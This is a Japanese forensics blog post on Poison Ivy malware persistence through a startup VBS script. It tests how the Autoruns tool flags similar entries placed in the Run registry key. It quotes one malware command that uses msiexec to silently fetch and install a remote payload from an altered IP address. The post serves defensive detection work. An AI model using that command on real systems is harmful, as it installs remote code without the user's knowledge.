@port139 Blog

基本的にはデジタル・フォレンジックの技術について取り扱っていますが、記載内容には高確率で誤りが含まれる可能性があります。

Poison Ivy と MSIEXEC

8/23 に Fortinet から Poison Ivy に関する下記レポートが出ています。 

blog.fortinet.com

自動起動の仕組みとしては、スタートアップに VBS ファイルを登録する方式になっています。登録された VBS ファイルはピンクハイライトになる為、Autoruns であれば簡単に見分ける事ができます。

f:id:hideakii:20170909081023p:plain

 VBS ファイルの内容は、上記記事の「Figure 4. Thumb.vbs in the Startup folder and its content」スクリーンショットで内容を確認できます。興味深い点としては、下記のように msiexec のパラメータとして URL が記述されている点です。(IPアドレス部分は変更しています)

"cmd.exe /c msiexec /q /i http://192.168.0.1/images/Thumbs.bmp"

例えば、このコマンドが Run キーに登録されている場合にはどうなるのでしょうか?

Run キーに検証する値を登録します。

f:id:hideakii:20170909081712p:plain

Autorunsで確認してみます。

f:id:hideakii:20170909081848p:plain

項目を選択し、引数を確認すれば URL が指定されている事を確認できます。

更に実験として Example2 を Run キーに登録してみます。(この様な登録方法が実際に動作するかは確認していません)

f:id:hideakii:20170909082740p:plain

Autorunsで確認してみます。

f:id:hideakii:20170909082919p:plain

結果としては黄色ハイライトになるようですね。

 

 

www.reverse.it

  

f:id:hideakii:20170909123928j:plain